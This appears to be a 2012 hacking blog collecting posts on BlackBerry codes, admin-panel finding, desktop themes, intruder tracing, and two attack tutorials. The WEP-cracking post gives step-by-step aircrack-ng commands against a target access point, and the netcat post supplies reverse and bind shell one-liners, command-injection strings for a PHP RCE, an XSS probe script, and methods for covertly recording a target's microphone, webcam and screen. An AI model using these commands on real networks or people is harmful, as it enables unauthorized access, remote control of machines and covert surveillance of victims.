Monday, December 24, 2012

Blackberry Secret Codes

In that Post I will share you a Blackberry Secret Codes for those who Using Blackberry Smartphones, Here are some information secret codes that you've probably never know. These codes may work in an emergency or even want to know the content or what was done (log) will be indicated by displaying the log report.

 * Not all types of Blackberry support the code, but most of can supported * 

Hidden Codes (HOLD ALT KEY)

Changes the signal meter from the standard bars to a decibel display, entering the code again will revert back to the bars

The Techinical information menu, if you are trying to get support or help you will probably need the information displayed here

Validates the address book, can only be used in the address book

Forces the address book to rebuild, can only be used in the address book

Used in the browser to view the page source code, useful if you are developing applications

Displays the devices event log, if you are struggling to get BES/BIS working the information here can be very useful

Soft reset a blackberry device, this is not a format or hard reset. Just a reboot

8) *#06#
Displays the IMEI (home screen)

Smart System Codes (Type these in a message box when u compose a mail, type a code give a space its appear)

Displays the Software Version and Model Number of the device

2) LD
Local Date is displayed

3) LT
Local Time is displayed

Device PIN is displayed

Displays the device owner information



Thursday, October 25, 2012

How To Find Admin Login Page or control panel of website online

 Hello Guys:-

           I can see that many of you is unable or don’t know how to find the admin login pages, control panel of a website, I saw many people do searches online like "find admin panel online" , "admin panel finder" so i thought about writing a little tutorial about the method i use to find admin login pages and most of the times its works like a charm.

           Using the Tools you can find login pages very fast. It tests about 2 url's every second, and does check 200 links in less than a minute. Of course it also depends on your internet speed.

             I added Some online tricks to use online manually by modifying some changes in URL and some tools which helps to find out admin pages or website control panel.

Admin Pages look like these : or admin.php or admin.asp or admin.jsp

My Best One I Ever Use For Testing or try port 2083

U also Find Out Login Pages Online sites Just Put up  your Target URL On that Site, And It will Check Automatically, Using Online Site Or Tools when u get the 200 OK Response Means Admin Page is Found..

Download Link:- Admin page Finder By venomous hacker 

File verified by Virustotal

Any Issue about files e-mail me on

Saturday, September 22, 2012

Themes for Windows XP 7 or Vista 64-bit and 86-bit

Hi Folks,

              I have Superb Theme For Your Windows Based System, These theme Supports,
Windows-XP SP2 SP3(64-bit), Windows 7 (64bit or 86bit), Windows 8 (64bit or 86bit)
              I added Theme Tutorial In Theme Pack it has Information about Theme like How to install theme, How to patch All Icons, which tool u needed before Installing.
And Important is After Download Theme Pack Must Read the READ ME FIRST .txt file

Here Is Some Screenshots of themes Hope You Like It:-

Download Link:-

Must Read the READ ME FIRST.txt file Its include in Theme Folder.

Tuesday, July 31, 2012

How to Customize Desktop in windows and Linux

First Install RAINMETER On your System

Rainmeter 3.0 beta:

See Video :

Download Desktop Skins from here: 

BlueVision v0.2:

IronMan Devices:

Rainmeter clock:

Download HUD Evolution and Alienware Themes From Here :

HUD Evolution :  For HUD Evolution Click here


AlienGUIse Breed Theme: 

Ex. 1

Ex. 2

Installed programs:

-Stardock MyColors
-AlienGUIse Breed Theme (for Windows 7)
-Rainmeter (Rainthemes)
-ObjectDock Plus 2
-BlueVision v0.2 Alpha (Rainmeter skin)
-Iron Man: Weather Machine (Atmosphere Readings)
-Rainmeter Clock (animated dials)

For EX. 2 package Download Hackers pack from rainmeter

After  Downloading :

Place your skins which should be located in the Skins folder of the Rainmeter folder

Should look like this 

C:\Users\<Your-User>\Documents\Rainmeter\Skins\  <-- palce in there with the rest of the Folders

Refresh your Rainmeter and should be there..

Wednesday, July 18, 2012

Cracking wep key

Required Tools For crack wireless key :-

  • You will need a computer with a wireless adapter listed here
  • Download Backtrack  and burn it’s image to a CD

Tools We are used :-

  • Kismet – a wireless network detector and packet sniffer
  • airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
  • airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
  • aireplay – a tool for forging ARP requests
  • aircrack – a tool for decrypting WEP keys
  • iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
  • macchanger – a tool that allows you to view and/or spoof (fake) your MAC address
What is :- 
  • AP: Access Point: a wireless router
  • MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
  • BSSID: Access Point’s MAC address
  • ESSID: Access Point’s Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name but Kismet may be able to detect it anyway
  • TERMINAL: MS-Dos like command line interface. You can open this by clicking the black box icon next to the start key in backtrack
  • WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
  • WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption
STEP 1:-

Monitoring Wireless Traffic With Kismet

Place the backtrack CD into your cd-rom drive and boot into Backtrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like “Hit ctrl+esc to change bios settings”. Changing your first boot device to cdrom will do the trick. Once booted into linux, login as root with username: root password: toor. These are the default username and password used by backtrack. A command prompt will appear.
root@bt:~# airmon-ng
Interface       Chipset         Driver
wlan0           Ralink 2573 USB rt73usb - [phy0]
STEP 2:-
root@bt:~# airmon-ng start wlan0 

STEP 3:-
Finding a suitable Target

After putting your card into monitor mode ,we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command

root@bt:~# airdump-ng wlan0

STEP 4:-

Attacking The Target

Now to crack the WEP key you’ll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands

root@bt:~#  airodump-ng --bssid 00:11:22:33:44:55 -c (channel no) -w (filename) mon0

  • -w tells airodump to write the file
  • -c is the channel of my target AP

STEP 5:-

using airplay speed up cracking:- 

root@bt:~# aireplay-ng -1 3 -a 00:11:22:33:44:55 mon0 

STEP 6:-

Associate your wireless card with the AP you are accessing.

root@bt:~#aireplay-ng -1 0 -e linksys -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 mon0
  • -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing aireplay-ng -h
  • 0 specifies the delay between attacks
  • -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
  • -a is the bssid tag(MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address.macchanger -s mon0
STEP 7:-

Start packet injection with aireplay:-

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 mon0

  • -b requires the MAC address of the AP we are accessing.
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address.macchanger -s mon0
  • if packets are being collected at a slow pace you can typeiwconfig ath0 rate auto to adjust your wireless adapter’s transmission rate. You can find your AP’s transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.
As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren’t many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.

If you get a message like this:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?
STEP 8:-
Decrypting the WEP Key with Aircrack:- 

root@bt:~# aircrack-ng filename.cap

Once you have enough captured data packets decrypting the key will only take a couple of seconds. For my AP it took me 380k data packets. If aircrack doesn’t find a key almost immediately, just sit back and wait for more data packets.

Tuesday, June 5, 2012

How To Trace A HACKER Who Hacked You


This Commands for windows os

1:open command prompt(CMD)

2:type in that netstat -b or -o

3:then you will see all the connections to your pc

4:open task manager then go to view then select columns then Process 
Identifier (Pid)

5:now open CMD you should see all the ip and sites or networking 
applications they have a Process Identifier

6:compare them and find a weired process like svchost then trace where the file is

7:kill the process then delete the file creating it, check your startup for it also

8:go to run and type msconfig

9:go to startup and disable all the things..

And U want to try on ur Linux system then use same method but commands are diffrent:-

1: open ur Terminal (ctrl+shift+t)

2: type netstat -b or -o (this command for comman for windows or linux)

3: open process list  type ps -a in terminal

4: comapare the process and kill the process

5: kill <pid no> (this command use for the kill the process)

try it............ :) 

Saturday, May 19, 2012

NETCAT the Swiss Knife

Full NetCat Overview

The basics of Netcat can be found in the man page which is good for beginners, you can find the man page for your version of netcat by typing this in the terminal:
$ man nc
If you don't like reading man pages through the terminal you can install the package "man2html" which makes it possible to read the manuals through the browser or just Google the man page with the query "man <program>" ("man nc" in our case).

Make netcat listen for a connection

nc -l <port>
Netcat will start to listen on the defined <port>, as soon as something makes a full 3-way TCP handshake to the port there is the possibility of transferring data, the connection can be closed at any time from both sides; once the connection is closed the netcat process is also stopped and the port will be closed again.
nc -l 1337
1. You may need the -p parameter to define the port; in most versions this is not required (nc -l -p 1337).
2. If you want to force netcat to stay listening after one connection you can use the -k flag. (nc -l -k 1337)
3. Using the -v (verbose) flag will make netcat output who is connecting (over stderr), this is good to know when using the -k flag because it is possible that there are different computers connecting to you.
4. Flags can be parsed in a chain like this: "nc -lkv 1337".

Make netcat connect

nc <computer> <port>
Netcat will establish a 3-way TCP handshake to the defined computer/port, when succeeded you can talk with the computer/port with the keyboard (stdin).
nc 80
1. Adding the "-v" (verbose) flag is a nice check to see if a website is up. Here is an example:
$ nc -v 80
Connection to
 80 port [tcp/www] succeeded!

Using files during connections

It is possible to save the data which is send to you or you can give netcat a file which should be sended when a connection is made.
Here is an example on how to save the data which is being send by the server:
$ nc hackingmachinetools.blogspot.com80 > response
# you can now send data but you won't see the output from the server because it is being redirected to a file.
$ nc 80 > response

$ cat response
HTTP/1.1 200 OK
Date: <timestamp>
Server: Apache
Last-Modified: <timestamp>
Accept-Ranges: bytes
Content-Length: 3383
Connection: close
Content-Type: text/html
It is also possible to give netcat a file which should be pushed over the connection as soon as netcat connects, here is an example where we make the local computer listen over port 1337 and netcat will connect to it and push a file through the connection.
# First we need a file so let's create one already.
$ echo "Hello world" > file
# In another terminal we make netcat listen on port 1337 and wait for the file.
$ nc -l 1337
# Now we are going to connect to the port and push the file through the connection.
$ nc localhost 1337 < file
# Look on in the terminal where you just made netcat listen, here is the output:
$ nc -l 1337
Hello world
# You may have noticed that the connection was terminated, this is normal when you push a file through the connection netcat will terminate it when the eof is reached.
Alright, now let's try to do some cool things with this.
We can transfer files this way by making netcat listen on the first side of the connection and capture it on the other side.
# First make it listen and tell it to capture the output to a file.
$ nc -l 1337 > backup.tar.gz
# Now connect to it and push a file in it
$ nc localhost 1337 < backup.tar.gz
# Now you got a file which is called "backup.tar.gz" and contains the same content on both sides.
Or reversed...
# Now make the server listen and anything that connects to it will get the file backup.tar.gz
$ nc -l 1337 < backup.tar.gz
# On the other side connect and save the contents
$ nc localhost 1337 > backup.tar.gz
# Same result: a copy of backup.tar.gz is made.
You can also monitor files this way:
# Make netcat listen, this time we do it with a pipe symbol, this is just another way to get the job done.
$ tail -f /var/log/apache2/access.log | nc -l 1337
# Connect to it
$ nc localhost 1337
<ip> - - [<timestamp>] <user agent>
<ip> - - [<timestamp>] <user agent>
<ip> - - [<timestamp>] <user agent>
<streaming output of /var/log/apache2/access.log>
# The connection will stay open and if there are any new requests you will immediately receive them.
Here is another very cool example, here we are going live eavesdrop the microphone of the target:
# We are going to use arecord for this and all output will be written to whatever is connected to port 1337.
arecord -f dat -t raw | nc -l 1337
# Now we have to connect to this port with netcat and we want to convert all data which is being send to .ogg format so we can hear it.
nc localhost 1337 | oggenc - -r -o nc.ogg
# Now just open nc.ogg with ogg123/vlc or something you like and you will have a live stream with your target's microphone. It will also save all the data to nc.ogg which is good for when you later want to analyze what people said.
The same method can be used for eavesdropping the screen/webcam/anything you like, just find a nice package which can do the job for you.
For desktop and sound eavesdropping the package "recordmydesktop" is good when it's installed.
Getting a good streaming connection with screen and sound is pretty hard so what I did to get it to work is just make a dumpfile like this:
recordmydesktop --on-the-fly-encoding --overwrite -o /tmp/nc.ogv
And later transfer the entire contents to me the way we earlier transferred files.
nc -l 1337 < /tmp/nc.ogv
Then you can just view the video and recorded sound.
Be sure you don't let the entire hard disk overflow with this because it will stay recording, a simple command can kill the recordmydesktop process again.
$ killall recordmydesktop
Or just find the pid with the program ps and kill the pid.
Eavesdropping the webcam with nc is very detectable due to the blinking light/steady green light on the webcam these days, what you can do is just making pictures which will only make it blink very fast, I you can use various packets for it but I will demonstrate it here with streamer.
# First you make a photo and save it in /tmp/image.jpeg, then you set netcat to listen and let it present the photo once somebody connects to it.
$ while [ 1 ]; do streamer -o /tmp/photo.jpeg; nc -l 1337 < /tmp/photo.jpeg; done
# On the other side you connect to it and save the current image.
$ nc localhost 1337 > image.jpeg
# Now the picture will get updated and when reconnecting you will get a new picture real time.
The same idea can be implemented for screenshots.
# listen
$ while true; do import -window root /tmp/image.png; nc -l 1337 < /tmp/image.png; done
# and connect
$ nc localhost 1337 > image.png
# Screenshot is updated and you can grab a new screenshot.

Portscan a target with netcat

nc -zv <target> <port/port range> 2>&1 | grep succeeded
Netcat will start trying to make full 3-way TCP handshakes over the port/port range.
-> SYN
-> ACK
nmap does it a little bit different and injects a RST packet instead of an ACK, this causes the connection to not fully get established and is way more stealthy.
-> SYN
-> RST
"2>&1" is because we want to redirect stderr (standard error) and stdout (standard output) both to a file, I will be using this a lot in the following port scan examples so remember this.
nc -zv 1-3400 2>&1 | grep succeeded
1. When using something like a PHP RCE exploit and you don't have a streaming connection through a shell it is useful to pipe the output to a file. Here is an example of how to do so:
nc -zv 1-3400 2>&1 | grep succeeded > /tmp/
#Inject it where you got a remote code execution exploit, here is an example:
#'; nc -zv 1-3400 2>&1 | grep succeeded > /tmp/; echo '
#This will happen server side in this example: $ ls '/var/www/images/'; nc -zv 1-3400 2>&1 | grep succeeded > /tmp/; echo '';

Portscan a network range with netcat

method 1, subnet scanning
# We will be scanning the subnet for port 80, results can be found back in /tmp/pscan and it is all multi tasked so this shouldn't take longer than a second or 2.
$ range="10.13.37."; port=80; for host in $(seq 1 255); do multi_task=$(result=$(nc -zv $range$host $port 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $range$host":"$port >> "/tmp/pscan"; fi;) & done
method 2, list based scanning
# You will need a file filled with hosts for this, I used /tmp/hosts which contained:
$ port=80; for host in $(cat /tmp/hosts); do multi_task=$(result=$(nc -zv $host $port 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $host":"$port >> "/tmp/pscan"; fi;) & done
# It's all multi tasked again and the structure is pretty similar to the method 1.
method 3, network subnet scanning all ports on all hosts
Extremely noisy to firewalls and might eat a lot of CPU but it works, you can also save it to a file and issue it with the command "nice -n 20" this makes it a little nicer for your CPU.
$ range="10.13.37."; for host in $(seq 1 255); do multi_task=$(result=$(nc -zv $range$host 1-65535 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $result >> "/tmp/pscan"; fi;) & done
method 4 list based scanning with delay
Some delay between the ports is good for letting the firewalls think there is nothing special going on.
This will scan all the hosts in /tmp/hosts on ports 20-100 with 1 second delay between the ports and save the results to /tmp/pscan.
ports=$(seq 20 100)
for host in $(cat /tmp/hosts); do
 for port in $ports; do
  result=$(nc -zv $range$host $port 2>&1 | grep succeeded);
  if [ -n "$result" ]; then
   echo $range$host":"$port >> "/tmp/pscan";
  sleep 1;
1. If you don't want multi tasked scanning which can be pretty extensive and noisy replace the "& done" for "; done".
2. Adding the -r flag will make the source and or destination port ranges random instead of letting the system assign which ports to use.

Banner grabbing

Port scanning is fun but we can't do a lot with this until we properly fingerprinted the programs behind the ports, this can be done with a technique called banner grabbing.
Now that the scripts are getting bigger and bigger I won't be displaying one liners anymore, you will have to write the files to filenames and execute them.
Here is a script which will port scan and banner grab automatically with netcat.
It will check for the SSH and MySQL version by connecting and saving the results and it will see if the HTTP server is vulnerable to the TRACE method, look in the dumpfile /tmp/bannergrab and look for "<script>alert(123)</script>" if you can find that back you got yourself a vulnerable server.
# You can change this to a port range $(seq 20 25) is port 20-25
ports="22 80 3306";

http_header="HEAD / HTTP/0.1\n\n";

for host in $(seq 137 139); do
 for port in $ports; do
  echo "[+] Testing "$range$host":"$port;
  result=$(nc -zv $range$host $port 2>&1 | grep succeeded);
  if [ -n "$result" ]; then
   echo "\n"$range$host":"$port"\n" >> "/tmp/bannergrab"
   if [ "$port" -eq "22" ]; then
    echo "Found open port "$range$host":"$port" Here might be some SSH server, it echoes the SSH version to you on connecting when lucky.";
    nc -v $range$host $port -w 1 >> "/tmp/bannergrab";
   if [ "$port" -eq "80" ]; then
    echo "Found open port "$range$host":"$port" Trying to fingerprint with HEAD and see if the server is vulnerable to TRACE XSSing";
    echo $http_header | nc -v -w 2 $range$host $port >> "/tmp/bannergrab"
    echo "TRACE / HTTP/1.1\nHost: $range$host\nuser-agent: <script>alert(123)</script>\n\n" | nc -v -w 2 $range$host $port >> "/tmp/bannergrab"
   if [ "$port" -eq "3306"]; then
    echo "Found open port "$range$host":"$port" Possible MySQL installation found, saving the banner for later inspection, the MySQL version can be found in this.";
    nc -v $range$host $port -w 1 >> "/tmp/bannergrab";

Basic netcat backdoor shells

There is a flag "-e" in netcat, with this you can let netcat automatically listen with the specified program, it has been removed because of the security issues related to this, there has been a public exploit exploiting a buffer overflow in this since 2004 on windows and there has not been a patch.
# For *nix systems you can use this:
$ nc -l -e /bin/sh localhost 1337
# And for Windows systems you can use this:
$ nc -l -e cmd.exe cmd.exe 1337
Just another reminder, you might need the -p flag before the port, in the latest versions this is not required but the later versions also don't support the -e flag.
Once you executed this command on the computer you can simply netcat in it and you will have your shell.
You may wonder why a buffer overflow is a problem in a function which is mainly for creating a backdoor, it's because there are mail server scripts and things like that which depend on netcat.
You can also just give it another program for example this would open a port and echo anything back.
$ nc -l -e /bin/cat localhost 1337
Here you don't have supposedly a backdoor running but with the buffer overflow you could exploit it.
Anyway, let's reverse things, listening shells are way too detectable and when there is some basic port forwarding you can't get in already.
This way you will make yourself listen and netcat will connect to you and give you a shell.
# You do:
$ nc -lv 1337
# And on the machine you want to backdoor you do:
$ nc -e /bin/sh <Your IP> 1337
Be sure the remote computer can reach you over that port, when you have a home user setup you probably just have to go inside your router and port forward the port to your computer to make it work.

Better netcat backdoor shells

Since the -e flag has been removed in most versions we have to hack our way around it.
Here is a basic exmple of how to do so:
mkfifo /tmp/pipe;
sh /tmp/pipe | nc -l 1337 > /tmp/pipe
Just connect to it and you got a shell.
Here is the reversed version:
mkfifo /tmp/pipe
sh /tmp/pipe | nc localhost 1338 > /tmp/pipe
Unencrypted shell streams are very easy to sniff, we should encrypt them.
!under consruction! - blowfish encryption
# This script is for the connecting client.


echo $1 > cache_cmd;
openssl enc -bf -pass pass:passwd -in cache_cmd | nc localhost 1337

# This script is for the listening server.


openssl enc -bf -d -in $1 -pass pass:$password -out cache;
cat cache;

#tiny notes
openssl enc -bf -d -in pipe -pass pass:passwd | nc -l 1337 > pipe

openssl enc -bf -pass pass:passwd -in cache_cmd | nc localhost 1337